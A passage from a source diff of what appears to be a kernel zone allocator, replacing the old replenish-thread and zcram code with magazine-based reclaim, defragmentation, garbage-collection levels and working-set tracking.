meta[i].zm_bitmap = 0; + } + } else { + bitmap_ref = meta->zm_bitmap; + meta->zm_bitmap = 0; } - - if (asynchronously) { - assert_wait_timeout(&z->prio_refill_count, - THREAD_UNINT, 1, 100 * NSEC_PER_USEC); - thread_block(THREAD_CONTINUE_NULL); - } else if (++retry == 3) { - zone_replenish_panic(z, kr); + meta->zm_chunk_len = 0; + } else { + if (!meta->zm_inline_bitmap) { + bitmap_ref = meta->zm_bitmap; } - - lock_zone(z); + zone_counter_sub(z, z_va_cur, z->z_percpu ? 1 : z->z_chunk_pages); + bzero(meta, sizeof(*meta) * z->z_chunk_pages); } - zcram_and_lock(z, space, alloc_size); + zone_unlock(z); -#if CONFIG_ZLEAKS - if (__improbable(zleak_state & ZLEAK_STATE_ACTIVE)) { - if (!z->zleak_on && - zone_size_wired(z) >= zleak_per_zone_tracking_threshold) { - z->zleak_on = true; - } + if (bitmap_ref) { + zone_bits_free(bitmap_ref); } -#endif /* CONFIG_ZLEAKS */ -} - -/* - * High priority VM privileged thread used to asynchronously refill a given zone. - * These are needed for data structures used by the lower level VM itself. The - * replenish thread maintains a reserve of elements, so that the VM will never - * block in the zone allocator. - */ -__dead2 -static void -zone_replenish_thread(void *_z, wait_result_t __unused wr) -{ - zone_t z = _z; - current_thread()->options |= (TH_OPT_VMPRIV | TH_OPT_ZONE_PRIV); - - for (;;) { - lock_zone(z); - assert(z->z_self == z); - assert(z->zone_replenishing); - assert(z->prio_refill_count != 0); + /* Free the pages for metadata and account for them */ +#if KASAN_ZALLOC + kasan_poison_range(page_addr, size_to_free, ASAN_VALID); +#endif +#if VM_MAX_TAG_ZONES + if (z->tags) { + ztMemoryRemove(z, page_addr, size_to_free); + } +#endif /* VM_MAX_TAG_ZONES */ - while (z->countfree < z->prio_refill_count) { - assert(!z->expanding_no_vm_priv); - assert(!z->expanding_vm_priv); + if (sequester) { + kernel_memory_depopulate(zone_submap(z), page_addr, + size_to_free, KMA_KOBJECT, VM_KERN_MEMORY_ZONE); + } else { + kmem_free(zone_submap(z), page_addr, ptoa(z->z_chunk_pages)); + } - zone_replenish_locked(z, Z_WAITOK, true); + /* + * Freeing memory sometimes needs some (for example vm map entries + * to represent holes). + * + * If there are any active replenish threads, we need to let them work + * while we hold no locks. Only do so right after we just freed memory + * once however to give them even more chances to find fresh pages. + */ + zone_replenish_wait_if_needed(); - assert(z->z_self == z); - zone_replenish_loops++; - } + thread_yield_to_preemption(); - /* Wakeup any potentially throttled allocations. */ - thread_wakeup(z); + zone_lock(z); - assert_wait(&z->prio_refill_count, THREAD_UNINT); + if (sequester) { + zone_meta_queue_push(z, &z->z_pageq_va, meta); + } +} - /* - * We finished refilling the zone, so decrement the active count - * and wake up any waiting GC threads. - */ - lck_spin_lock(&zone_replenish_lock); - assert(zone_replenish_active > 0); - if (--zone_replenish_active == 0) { - thread_wakeup((event_t)&zone_replenish_active); - } - lck_spin_unlock(&zone_replenish_lock); +static uint16_t +zone_reclaim_elements(zone_t z, uint16_t *count, zone_element_t *elems) +{ + uint16_t n = *count; - z->zone_replenishing = false; - unlock_zone(z); + z_debug_assert(n <= zc_mag_size()); - thread_block(THREAD_CONTINUE_NULL); - zone_replenish_wakeups++; + for (uint16_t i = 0; i < n; i++) { + zone_element_t ze = elems[i]; + elems[i].ze_value = 0; + zfree_drop(z, zone_element_validate(z, ze), ze, false); } + + *count = 0; + return n; } -void -zone_prio_refill_configure(zone_t z) +static uint16_t +zone_reclaim_recirc_magazine(zone_t z, struct zone_depot *mags) { - thread_t th; - kern_return_t tres; + zone_magazine_t mag = STAILQ_FIRST(&z->z_recirc); - lock_zone(z); - assert(!z->prio_refill_count && !z->destructible); - z->prio_refill_count = (uint16_t)(ZONE_REPLENISH_TARGET / zone_elem_size(z)); - z->zone_replenishing = true; - unlock_zone(z); + STAILQ_REMOVE_HEAD(&z->z_recirc, zm_link); + STAILQ_INSERT_TAIL(mags, mag, zm_link); + zone_counter_sub(z, z_recirc_cur, 1); - lck_spin_lock(&zone_replenish_lock); - ++zone_replenish_max_threads; - ++zone_replenish_active; - lck_spin_unlock(&zone_replenish_lock); - OSMemoryBarrier(); + z_debug_assert(mag->zm_cur == zc_mag_size()); - tres = kernel_thread_start_priority(zone_replenish_thread, z, - MAXPRI_KERNEL, &th); - if (tres != KERN_SUCCESS) { - panic("zone_prio_refill_configure, thread create: 0x%x", tres); + for (uint16_t i = 0; i < zc_mag_size(); i++) { + zone_element_t ze = mag->zm_elems[i]; + mag->zm_elems[i].ze_value = 0; + zfree_drop(z, zone_element_validate(z, ze), ze, true); } - thread_deallocate(th); + mag->zm_cur = 0; + + return zc_mag_size(); } static void -zone_randomize_freelist(zone_t zone, struct zone_page_metadata *meta, - vm_offset_t size, zone_addr_kind_t kind, unsigned int *entropy_buffer) -{ - const vm_size_t elem_size = zone_elem_size(zone); - vm_offset_t left, right, head, base; - vm_offset_t element; - - left = ZONE_PAGE_FIRST_OFFSET(kind); - right = size - ((size - left) % elem_size); - head = 0; - base = zone_meta_to_addr(meta, kind); - - while (left < right) { - if (zone_leaks_scan_enable || __improbable(zone->tags) || - random_bool_gen_bits(&zone_bool_gen, entropy_buffer, MAX_ENTROPY_PER_ZCRAM, 1)) { - element = base + left; - left += elem_size; - } else { - right -= elem_size; - element = base + right; - } +zone_depot_trim(zone_cache_t zc, struct zone_depot *head) +{ + zone_magazine_t mag; + + if (zc->zc_depot_cur == 0 || + 2 * (zc->zc_depot_cur + 1) * zc_mag_size() <= zc->zc_depot_max) { + return; + } - vm_offset_t *primary = (vm_offset_t *)element; - vm_offset_t *backup = get_backup_ptr(elem_size, primary); + zone_depot_lock(zc); - *primary = *backup = head ^ zp_nopoison_cookie; - head = element; + while (zc->zc_depot_cur && + 2 * (zc->zc_depot_cur + 1) * zc_mag_size() > zc->zc_depot_max) { + mag = STAILQ_FIRST(&zc->zc_depot); + STAILQ_REMOVE_HEAD(&zc->zc_depot, zm_link); + STAILQ_INSERT_TAIL(head, mag, zm_link); + zc->zc_depot_cur--; } - meta->zm_freelist_offs = (uint16_t)(head - base); + zone_depot_unlock(zc); } -/* - * Cram the given memory into the specified zone. Update the zone page count accordingly. +__enum_decl(zone_reclaim_mode_t, uint32_t, { + ZONE_RECLAIM_TRIM, + ZONE_RECLAIM_DRAIN, + ZONE_RECLAIM_DESTROY, +}); + +/*! + * @function zone_reclaim + * + * @brief + * Drains or trim the zone. + * + * @discussion + * Draining the zone will free it from all its elements. + * + * Trimming the zone tries to respect the working set size, and avoids draining + * the depot when it's not necessary. + * + * @param z The zone to reclaim from + * @param mode The purpose of this reclaim. */ static void -zcram_and_lock(zone_t zone, vm_offset_t newmem, vm_size_t size) +zone_reclaim(zone_t z, zone_reclaim_mode_t mode) { - unsigned int entropy_buffer[MAX_ENTROPY_PER_ZCRAM] = { 0 }; - struct zone_page_metadata *meta; - zone_addr_kind_t kind; - uint32_t pg_count = (uint32_t)atop(size); - uint32_t zindex = zone_index(zone); - uint32_t free_count; - uint16_t empty_freelist_offs = PAGE_METADATA_EMPTY_FREELIST; - - /* Basic sanity checks */ - assert(zone != ZONE_NULL && newmem != (vm_offset_t)0); - assert((newmem & PAGE_MASK) == 0); - assert((size & PAGE_MASK) == 0); + struct zone_depot mags = STAILQ_HEAD_INITIALIZER(mags); + zone_magazine_t mag, tmp; - KDBG(MACHDBG_CODE(DBG_MACH_ZALLOC, ZALLOC_ZCRAM) | DBG_FUNC_START, - zindex, size); + zone_lock(z); - kind = zone_addr_kind(newmem, size); -#if DEBUG || DEVELOPMENT - if (zalloc_debug & ZALLOC_DEBUG_ZCRAM) { - kprintf("zcram(%p[%s%s], 0x%lx%s, 0x%lx)\n", zone, - zone_heap_name(zone), zone->z_name, (uintptr_t)newmem, - kind == ZONE_ADDR_FOREIGN ? "[F]" : "", (uintptr_t)size); - } -#endif /* DEBUG || DEVELOPMENT */ + if (mode == ZONE_RECLAIM_DESTROY) { + if (!z->z_destructible || z->z_pcpu_cache || + z->z_elems_rsv || z->z_allows_foreign) { + panic("zdestroy: Zone %s%s isn't destructible", + zone_heap_name(z), z->z_name); + } - /* - * Initialize the metadata for all pages. We dont need the zone lock - * here because we are not manipulating any zone related state yet. - * - * This includes randomizing the freelists as the metadata isn't - * published yet. - */ + if (!z->z_self || z->z_expander || z->z_expander_vm_priv || + z->z_async_refilling || z->z_expanding_wait) { + panic("zdestroy: Zone %s%s in an invalid state for destruction", + zone_heap_name(z), z->z_name); + } - if (kind == ZONE_ADDR_NATIVE) { +#if !KASAN_ZALLOC /* - * We're being called by zfill, - * zone_replenish_thread or vm_page_more_fictitious, + * Unset the valid bit. We'll hit an assert failure on further + * operations on this zone, until zinit() is called again. * - * which will only either allocate a single page, or `alloc_pages` - * worth. + * Leave the zone valid for KASan as we will see zfree's on + * quarantined free elements even after the zone is destroyed. */ - assert(pg_count <= zone->alloc_pages); - + z->z_self = NULL; +#endif + z->z_destroyed = true; + } else if (z->z_destroyed) { + return zone_unlock(z); + } else if (z->z_replenishes && z->z_async_refilling) { /* - * Make sure the range of metadata entries we're about to init - * have proper physical backing, then initialize them. + * If the zone is replenishing, leave it alone. */ - meta = zone_meta_from_addr(newmem, kind); - zone_meta_populate(meta, meta + pg_count); + return zone_unlock(z); + } - if (zone->permanent) { - empty_freelist_offs = 0; + if (z->z_pcpu_cache) { + if (mode != ZONE_RECLAIM_TRIM) { + zpercpu_foreach(zc, z->z_pcpu_cache) { + zc->zc_depot_max /= 2; + } + } else { + zpercpu_foreach(zc, z->z_pcpu_cache) { + if (zc->zc_depot_max > 0) { + zc->zc_depot_max--; + } + } } - meta[0] = (struct zone_page_metadata){ - .zm_index = zindex, - .zm_page_count = pg_count, - .zm_percpu = zone->percpu, - .zm_freelist_offs = empty_freelist_offs, - }; + zone_unlock(z); - for (uint32_t i = 1; i < pg_count; i++) { - meta[i] = (struct zone_page_metadata){ - .zm_index = zindex, - .zm_page_count = i, - .zm_percpu = zone->percpu, - .zm_secondary_page = true, - .zm_freelist_offs = empty_freelist_offs, - }; + if (mode == ZONE_RECLAIM_TRIM) { + zpercpu_foreach(zc, z->z_pcpu_cache) { + zone_depot_trim(zc, &mags); + } + } else { + zpercpu_foreach(zc, z->z_pcpu_cache) { + zone_depot_lock(zc); + STAILQ_CONCAT(&mags, &zc->zc_depot); + zc->zc_depot_cur = 0; + zone_depot_unlock(zc); + } } - if (!zone->permanent) { - zone_randomize_freelist(zone, meta, - zone->percpu ? PAGE_SIZE : size, kind, entropy_buffer); + zone_lock(z); + + uint32_t freed = 0; + + STAILQ_FOREACH(mag, &mags, zm_link) { + freed += zone_reclaim_elements(z, + &mag->zm_cur, mag->zm_elems); + + if (freed >= zc_free_batch_size) { + z->z_elems_free_min += freed; + z->z_elems_free_max += freed; + z->z_elems_free += freed; + zone_unlock(z); + thread_yield_to_preemption(); + zone_lock(z); + freed = 0; + } } - } else { - if (!zone->allows_foreign || !from_foreign_range(newmem, size)) { - panic("zcram_and_lock: foreign memory [%lx] being crammed is " - "outside of foreign range", (uintptr_t)newmem); + + if (mode == ZONE_RECLAIM_DESTROY) { + zpercpu_foreach(zc, z->z_pcpu_cache) { + freed += zone_reclaim_elements(z, + &zc->zc_alloc_cur, zc->zc_alloc_elems); + freed += zone_reclaim_elements(z, + &zc->zc_free_cur, zc->zc_free_elems); + } + + z->z_elems_free_wss = 0; + z->z_elems_free_min = 0; + z->z_elems_free_max = 0; + z->z_contention_cur = 0; + z->z_contention_wma = 0; + } else { + z->z_elems_free_min += freed; + z->z_elems_free_max += freed; + } + z->z_elems_free += freed; + } + + for (;;) { + struct zone_page_metadata *meta; + uint32_t count, goal, freed = 0; + + goal = z->z_elems_rsv; + if (mode == ZONE_RECLAIM_TRIM) { + /* + * When trimming, only free elements in excess + * of the working set estimate. + * + * However if we are in a situation where the working + * set estimate is clearly growing, ignore the estimate + * as the next working set update will grow it and + * we want to avoid churn. + */ + goal = MAX(goal, MAX(z->z_elems_free_wss, + z->z_elems_free - z->z_elems_free_min)); + + /* + * Add some slop to account for "the last partial chunk in flight" + * so that we do not deplete the recirculation depot too harshly. + */ + goal += z->z_chunk_elems / 2; + } + + if (z->z_elems_free <= goal) { + break; } /* - * We cannot support elements larger than page size for foreign - * memory because we put metadata on the page itself for each - * page of foreign memory. + * If we're above target, but we have no free page, then drain + * the recirculation depot until we get a free chunk or exhaust + * the depot. * - * We need to do this in order to be able to reach the metadata - * when any element is freed. + * This is rather abrupt but also somehow will reduce + * fragmentation anyway, and the zone code will import + * over time anyway. */ - assert(!zone->percpu && !zone->permanent); - assert(zone_elem_size(zone) <= PAGE_SIZE - sizeof(struct zone_page_metadata)); + while (z->z_recirc_cur) { + if (z->z_recirc_cur * zc_mag_size() <= goal && + !zone_pva_is_null(z->z_pageq_empty)) { + break; + } + if (freed >= zc_free_batch_size) { + zone_unlock(z); + thread_yield_to_preemption(); + zone_lock(z); + freed = 0; + /* we dropped the lock, needs to reassess */ + continue; + } + freed += zone_reclaim_recirc_magazine(z, &mags); + } - bzero((void *)newmem, size); + if (zone_pva_is_null(z->z_pageq_empty)) { + break; + } - for (vm_offset_t offs = 0; offs < size; offs += PAGE_SIZE) { - meta = (struct zone_page_metadata *)(newmem + offs); - *meta = (struct zone_page_metadata){ - .zm_index = zindex, - .zm_page_count = 1, - .zm_freelist_offs = empty_freelist_offs, - }; - meta->zm_foreign_cookie[0] = ZONE_FOREIGN_COOKIE; - zone_randomize_freelist(zone, meta, PAGE_SIZE, kind, - entropy_buffer); + meta = zone_pva_to_meta(z->z_pageq_empty); + count = (uint32_t)ptoa(meta->zm_chunk_len) / zone_elem_size(z); + + if (z->z_elems_free - count < goal) { + break; } + + zone_reclaim_chunk(z, meta, count); } -#if VM_MAX_TAG_ZONES - if (__improbable(zone->tags)) { - assert(kind == ZONE_ADDR_NATIVE && !zone->percpu); - ztMemoryAdd(zone, newmem, size); + zone_unlock(z); + + STAILQ_FOREACH_SAFE(mag, &mags, zm_link, tmp) { + zone_magazine_free(mag); } -#endif /* VM_MAX_TAG_ZONES */ +} +static void +zone_reclam_all(zone_reclaim_mode_t mode) +{ /* - * Insert the initialized pages / metadatas into the right lists. + * Start with zones with VA sequester since depopulating + * pages will not need to allocate vm map entries for holes, + * which will give memory back to the system faster. */ - - lock_zone(zone); - assert(zone->z_self == zone); - - zone->page_count += pg_count; - if (zone->page_count_hwm < zone->page_count) { - zone->page_count_hwm = zone->page_count; + zone_foreach(z) { + if (z == zc_magazine_zone) { + continue; + } + if (z->z_va_sequester && z->collectable) { + zone_reclaim(z, mode); + } } - os_atomic_add(&zones_phys_page_count, pg_count, relaxed); - if (kind == ZONE_ADDR_NATIVE) { - os_atomic_add(&zones_phys_page_mapped_count, pg_count, relaxed); - if (zone->permanent) { - zone_meta_queue_push(zone, &zone->pages_intermediate, meta, kind); - } else { - zone_meta_queue_push(zone, &zone->pages_all_free, meta, kind); - zone->allfree_page_count += meta->zm_page_count; + zone_foreach(z) { + if (z == zc_magazine_zone) { + continue; } - free_count = zone_elem_count(zone, size, kind); - zone->countfree += free_count; - zone->countavail += free_count; - } else { - free_count = zone_elem_count(zone, PAGE_SIZE, kind); - for (vm_offset_t offs = 0; offs < size; offs += PAGE_SIZE) { - meta = (struct zone_page_metadata *)(newmem + offs); - zone_meta_queue_push(zone, &zone->pages_any_free_foreign, meta, kind); - zone->countfree += free_count; - zone->countavail += free_count; + if (!z->z_va_sequester && z->collectable) { + zone_reclaim(z, mode); } } - KDBG(MACHDBG_CODE(DBG_MACH_ZALLOC, ZALLOC_ZCRAM) | DBG_FUNC_END, zindex); + zone_reclaim(zc_magazine_zone, mode); } void -zcram(zone_t zone, vm_offset_t newmem, vm_size_t size) -{ - zcram_and_lock(zone, newmem, size); - unlock_zone(zone); -} - -/* - * Fill a zone with enough memory to contain at least nelem elements. - * Return the number of elements actually put into the zone, which may - * be more than the caller asked for since the memory allocation is - * rounded up to the next zone allocation size. - */ -int -zfill( - zone_t zone, - int nelem) +zone_gc(zone_gc_level_t level) { - kern_return_t kr; - vm_offset_t memory; - - vm_size_t alloc_size = ptoa(zone->alloc_pages); - vm_size_t nalloc_inc = zone_elem_count(zone, alloc_size, ZONE_ADDR_NATIVE); - vm_size_t nalloc = 0, goal = MAX(0, nelem); - int kmaflags = KMA_KOBJECT | KMA_ZERO; - - if (zone->noencrypt) { - kmaflags |= KMA_NOENCRYPT; - } - - assert(!zone->allows_foreign && !zone->permanent); + zone_reclaim_mode_t mode; - /* - * Trigger jetsams via the vm_pageout_garbage_collect thread if we're - * running out of zone memory - */ - if (is_zone_map_nearing_exhaustion()) { - thread_wakeup((event_t) &vm_pageout_garbage_collect); + switch (level) { + case ZONE_GC_TRIM: + mode = ZONE_RECLAIM_TRIM; + break; + case ZONE_GC_DRAIN: + mode = ZONE_RECLAIM_DRAIN; + break; + case ZONE_GC_JETSAM: + kill_process_in_largest_zone(); + mode = ZONE_RECLAIM_TRIM; + break; } - if (zone->va_sequester) { - lock_zone(zone); - - do { - struct zone_page_metadata *page_meta; - page_meta = zone_sequestered_page_get(zone, &memory); - if (NULL == page_meta) { - break; - } - unlock_zone(zone); - - kr = zone_sequestered_page_populate(zone, page_meta, - memory, alloc_size, kmaflags); - if (KERN_SUCCESS != kr) { - goto out_nolock; - } - - zcram_and_lock(zone, memory, alloc_size); - nalloc += nalloc_inc; - } while (nalloc < goal); - - unlock_zone(zone); - } + current_thread()->options |= TH_OPT_ZONE_PRIV; + lck_mtx_lock(&zone_gc_lock); -out_nolock: - while (nalloc < goal) { - kr = kernel_memory_allocate(submap_for_zone(zone), &memory, - alloc_size, 0, kmaflags, VM_KERN_MEMORY_ZONE); - if (kr != KERN_SUCCESS) { - printf("%s: kernel_memory_allocate() of %lu bytes failed\n", - __func__, (unsigned long)(nalloc * alloc_size)); - break; - } + zone_reclam_all(mode); - zcram(zone, memory, alloc_size); - nalloc += nalloc_inc; + if (level == ZONE_GC_JETSAM && zone_map_nearing_exhaustion()) { + /* + * If we possibly killed a process, but we're still critical, + * we need to drain harder. + */ + zone_reclam_all(ZONE_RECLAIM_DRAIN); } - return (int)nalloc; + lck_mtx_unlock(&zone_gc_lock); + current_thread()->options &= ~TH_OPT_ZONE_PRIV; } -/* - * We're being very conservative here and picking a value of 95%. We might need to lower this if - * we find that we're not catching the problem and are still hitting zone map exhaustion panics. - */ -#define ZONE_MAP_JETSAM_LIMIT_DEFAULT 95 - -/* - * Trigger zone-map-exhaustion jetsams if the zone map is X% full, where X=zone_map_jetsam_limit. - * Can be set via boot-arg "zone_map_jetsam_limit". Set to 95% by default. - */ -TUNABLE_WRITEABLE(unsigned int, zone_map_jetsam_limit, "zone_map_jetsam_limit", - ZONE_MAP_JETSAM_LIMIT_DEFAULT); - void -get_zone_map_size(uint64_t *current_size, uint64_t *capacity) +zone_gc_trim(void) { - vm_offset_t phys_pages = os_atomic_load(&zones_phys_page_mapped_count, relaxed); - *current_size = ptoa_64(phys_pages); - *capacity = zone_phys_mapped_max; + zone_gc(ZONE_GC_TRIM); } void -get_largest_zone_info(char *zone_name, size_t zone_name_len, uint64_t *zone_size) +zone_gc_drain(void) { - zone_t largest_zone = zone_find_largest(); - - /* - * Append kalloc heap name to zone name (if zone is used by kalloc) - */ - snprintf(zone_name, zone_name_len, "%s%s", - zone_heap_name(largest_zone), largest_zone->z_name); - - *zone_size = zone_size_wired(largest_zone); + zone_gc(ZONE_GC_DRAIN); } -boolean_t -is_zone_map_nearing_exhaustion(void) +static bool +zone_defrag_needed(zone_t z) { - vm_offset_t phys_pages = os_atomic_load(&zones_phys_page_mapped_count, relaxed); - return ptoa_64(phys_pages) > (zone_phys_mapped_max * zone_map_jetsam_limit) / 100; -} - + uint32_t recirc_size = z->z_recirc_cur * zc_mag_size(); -#define VMENTRY_TO_VMOBJECT_COMPARISON_RATIO 98 + if (recirc_size <= z->z_chunk_elems / 2) { + return false; + } + return recirc_size * zc_defrag_ratio > z->z_elems_free_wss * 100; +} -/* - * Tries to kill a single process if it can attribute one to the largest zone. If not, wakes up the memorystatus thread - * to walk through the jetsam priority bands and kill processes. +/*! + * @function zone_defrag_async + * + * @brief + * Resize the recirculation depot to match the working set size. + * + * @discussion + * When zones grow very large due to a spike in usage, and then some of those + * elements get freed, the elements in magazines in the recirculation depot + * are in no particular order. + * + * In order to control fragmentation, we need to detect "empty" pages so that + * they get onto the @c z_pageq_empty freelist, so that allocations re-pack + * naturally. + * + * This is done very gently, never in excess of the working set and some slop. */ static void -kill_process_in_largest_zone(void) +zone_defrag_async(__unused thread_call_param_t p0, __unused thread_call_param_t p1) { - pid_t pid = -1; - zone_t largest_zone = zone_find_largest(); + zone_foreach(z) { + struct zone_depot mags = STAILQ_HEAD_INITIALIZER(mags); + zone_magazine_t mag, tmp; + uint32_t freed = 0, goal = 0; - printf("zone_map_exhaustion: Zone mapped %lld of %lld, used %lld, map size %lld, capacity %lld [jetsam limit %d%%]\n", - ptoa_64(os_atomic_load(&zones_phys_page_mapped_count, relaxed)), ptoa_64(zone_phys_mapped_max), - ptoa_64(os_atomic_load(&zones_phys_page_count, relaxed)), - (uint64_t)zone_submaps_approx_size(), - (uint64_t)zone_range_size(&zone_info.zi_map_range), - zone_map_jetsam_limit); - printf("zone_map_exhaustion: Largest zone %s%s, size %lu\n", zone_heap_name(largest_zone), - largest_zone->z_name, (uintptr_t)zone_size_wired(largest_zone)); + if (!z->collectable || !zone_defrag_needed(z)) { + continue; + } - /* - * We want to make sure we don't call this function from userspace. - * Or we could end up trying to synchronously kill the process - * whose context we're in, causing the system to hang. - */ - assert(current_task() == kernel_task); + zone_lock(z); - /* - * If vm_object_zone is the largest, check to see if the number of - * elements in vm_map_entry_zone is comparable. - * - * If so, consider vm_map_entry_zone as the largest. This lets us target - * a specific process to jetsam to quickly recover from the zone map - * bloat. - */ - if (largest_zone == vm_object_zone) { - unsigned int vm_object_zone_count = zone_count_allocated(vm_object_zone); - unsigned int vm_map_entry_zone_count = zone_count_allocated(vm_map_entry_zone); - /* Is the VM map entries zone count >= 98% of the VM objects zone count? */ - if (vm_map_entry_zone_count >= ((vm_object_zone_count * VMENTRY_TO_VMOBJECT_COMPARISON_RATIO) / 100)) { - largest_zone = vm_map_entry_zone; - printf("zone_map_exhaustion: Picking VM map entries as the zone to target, size %lu\n", - (uintptr_t)zone_size_wired(largest_zone)); + goal = z->z_elems_free_wss + z->z_chunk_elems / 2 + + zc_mag_size() - 1; + + while (z->z_recirc_cur * zc_mag_size() > goal) { + if (freed >= zc_free_batch_size) { + zone_unlock(z); + thread_yield_to_preemption(); + zone_lock(z); + freed = 0; + /* we dropped the lock, needs to reassess */ + continue; + } + freed += zone_reclaim_recirc_magazine(z, &mags); } - } - /* TODO: Extend this to check for the largest process in other zones as well. */ - if (largest_zone == vm_map_entry_zone) { - pid = find_largest_process_vm_map_entries(); - } else { - printf("zone_map_exhaustion: Nothing to do for the largest zone [%s%s]. " - "Waking up memorystatus thread.\n", zone_heap_name(largest_zone), - largest_zone->z_name); - } - if (!memorystatus_kill_on_zone_map_exhaustion(pid)) { - printf("zone_map_exhaustion: Call to memorystatus failed, victim pid: %d\n", pid); + zone_unlock(z); + + STAILQ_FOREACH_SAFE(mag, &mags, zm_link, tmp) { + zone_magazine_free(mag); + } } } -#pragma mark zalloc module init - -/* - * Initialize the "zone of zones" which uses fixed memory allocated - * earlier in memory initialization. zone_bootstrap is called - * before zone_init. - */ -__startup_func void -zone_bootstrap(void) +compute_zone_working_set_size(__unused void *param) { - /* Validate struct zone_page_metadata expectations */ - if ((1U << ZONE_PAGECOUNT_BITS) < - atop(ZONE_MAX_ALLOC_SIZE) * sizeof(struct zone_page_metadata)) { - panic("ZONE_PAGECOUNT_BITS is not large enough to hold page counts"); - } + uint32_t zc_auto = zc_auto_threshold; + bool kick_defrag = false; - /* Validate struct zone_packed_virtual_address expectations */ - static_assert((intptr_t)VM_MIN_KERNEL_ADDRESS < 0, "the top bit must be 1"); - if (VM_KERNEL_POINTER_SIGNIFICANT_BITS - PAGE_SHIFT > 31) { - panic("zone_pva_t can't pack a kernel page address in 31 bits"); + /* + * Keep zone caching disabled until the first proc is made. + */ + if (__improbable(zone_caching_disabled < 0)) { + return; } - zpercpu_early_count = ml_early_cpu_max_number() + 1; - - /* Set up zone element poisoning */ - zp_bootstrap(); + zone_caching_disabled = vm_pool_low(); +#if ZALLOC_EARLY_GAPS + zone_cleanup_early_gaps_if_needed(); +#endif - random_bool_init(&zone_bool_gen); + if (os_mul_overflow(zc_auto, Z_CONTENTION_WMA_UNIT, &zc_auto)) { + zc_auto = 0; + } - /* - * the KASAN quarantine for kalloc doesn't understand heaps - * and trips the heap confusion panics. At the end of the day, - * all these security measures are double duty with KASAN. - * - * On 32bit kernels, these protections are just too expensive. - */ -#if !defined(__LP64__) || KASAN_ZALLOC - zsecurity_options &= ~ZSECURITY_OPTIONS_SEQUESTER; - zsecurity_options &= ~ZSECURITY_OPTIONS_SUBMAP_USER_DATA; - zsecurity_options &= ~ZSECURITY_OPTIONS_SEQUESTER_KEXT_KALLOC; -#endif + zone_foreach(z) { + uint32_t wma; + bool needs_caching = false; - thread_call_setup(&call_async_alloc, zalloc_async, NULL); + if (z->z_self != z) { + continue; + } -#if CONFIG_ZCACHE - /* zcc_enable_for_zone_name=: enable per-cpu zone caching for . */ - if (PE_parse_boot_arg_str("zcc_enable_for_zone_name", cache_zone_name, sizeof(cache_zone_name))) { - printf("zcache: caching enabled for zone %s\n", cache_zone_name); - } -#endif /* CONFIG_ZCACHE */ -} + zone_lock(z); -#if __LP64__ -#if CONFIG_EMBEDDED -#define ZONE_MAP_VIRTUAL_SIZE_LP64 (32ULL * 1024ULL * 1024 * 1024) -#else -#define ZONE_MAP_VIRTUAL_SIZE_LP64 (128ULL * 1024ULL * 1024 * 1024) -#endif -#endif /* __LP64__ */ + wma = z->z_elems_free_max - z->z_elems_free_min; + wma = (3 * wma + z->z_elems_free_wss) / 4; + z->z_elems_free_max = z->z_elems_free_min = z->z_elems_free; + z->z_elems_free_wss = wma; -#define SINGLE_GUARD 16384 -#define MULTI_GUARD (3 * SINGLE_GUARD) + if (!kick_defrag && zone_defrag_needed(z)) { + kick_defrag = true; + } -#if __LP64__ -static inline vm_offset_t -zone_restricted_va_max(void) -{ - vm_offset_t compressor_max = VM_PACKING_MAX_PACKABLE(C_SLOT_PACKED_PTR); - vm_offset_t vm_page_max = VM_PACKING_MAX_PACKABLE(VM_PAGE_PACKED_PTR); + /* fixed point decimal of contentions per second */ + wma = z->z_contention_cur * Z_CONTENTION_WMA_UNIT / + ZONE_WSS_UPDATE_PERIOD; + z->z_contention_cur = 0; + z->z_contention_wma = (3 * wma + z->z_contention_wma) / 4; - return trunc_page(MIN(compressor_max, vm_page_max)); -} -#endif + /* + * If the zone seems to be very quiet, + * gently lower its cpu-local depot size. + */ + if (z->z_pcpu_cache && wma < Z_CONTENTION_WMA_UNIT / 2 && + z->z_contention_wma < Z_CONTENTION_WMA_UNIT / 2) { + zpercpu_foreach(zc, z->z_pcpu_cache) { + if (zc->zc_depot_max > zc_mag_size()) { + zc->zc_depot_max--; + } + } + } -__startup_func -static void -zone_tunables_fixup(void) -{ - if (zone_map_jetsam_limit == 0 || zone_map_jetsam_limit > 100) { - zone_map_jetsam_limit = ZONE_MAP_JETSAM_LIMIT_DEFAULT; - } -} -STARTUP(TUNABLES, STARTUP_RANK_MIDDLE, zone_tunables_fixup); + /* + * If the zone has been contending like crazy for two periods, + * and is eligible, maybe it's time to enable caching. + */ + if (!z->z_nocaching && !z->z_pcpu_cache && !z->exhaustible && + zc_auto && z->z_contention_wma >= zc_auto && wma >= zc_auto) { + needs_caching = true; + } -__startup_func -static vm_size_t -zone_phys_size_max(void) -{ - mach_vm_size_t zsize; - vm_size_t zsizearg; + zone_unlock(z); - if (PE_parse_boot_argn("zsize", &zsizearg, sizeof(zsizearg))) { - zsize = zsizearg * (1024ULL * 1024); - } else { - zsize = sane_size >> 2; /* Set target zone size as 1/4 of physical memory */ -#if defined(__LP64__) - zsize += zsize >> 1; -#endif /* __LP64__ */ + if (needs_caching) { + zone_enable_caching(z); + } } - if (zsize < CONFIG_ZONE_MAP_MIN) { - zsize = CONFIG_ZONE_MAP_MIN; /* Clamp to min */ - } - if (zsize > sane_size >> 1) { - zsize = sane_size >> 1; /* Clamp to half of RAM max */ - } - if (zsizearg == 0 && zsize > ZONE_MAP_MAX) { - /* if zsize boot-arg not present and zsize exceeds platform maximum, clip zsize */ - vm_size_t orig_zsize = zsize; - zsize = ZONE_MAP_MAX; - printf("NOTE: zonemap size reduced from 0x%lx to 0x%lx\n", - (uintptr_t)orig_zsize, (uintptr_t)zsize); + if (kick_defrag) { + thread_call_enter(&zone_defrag_callout); } - - assert((vm_size_t) zsize == zsize); - return (vm_size_t)trunc_page(zsize); } -__startup_func -static struct zone_map_range -zone_init_allocate_va(vm_offset_t *submap_min, vm_size_t size, bool guard) +#endif /* !ZALLOC_TEST */ +#pragma mark vm integration, MIG routines +#if !ZALLOC_TEST + +/* + * Creates a vm_map_copy_t to return to the caller of mach_* MIG calls + * requesting zone information. + * Frees unused pages towards the end of the region, and zero'es out unused + * space on the last page. + */ +static vm_map_copy_t +create_vm_map_copy( + vm_offset_t start_addr, + vm_size_t total_size, + vm_size_t used_size) { - struct zone_map_range r; - kern_return_t kr; + kern_return_t kr; + vm_offset_t end_addr; + vm_size_t free_size; + vm_map_copy_t copy; - if (guard) { - vm_map_offset_t addr = *submap_min; - vm_map_kernel_flags_t vmk_flags = VM_MAP_KERNEL_FLAGS_NONE; + if (used_size != total_size) { + end_addr = start_addr + used_size; + free_size = total_size - (round_page(end_addr) 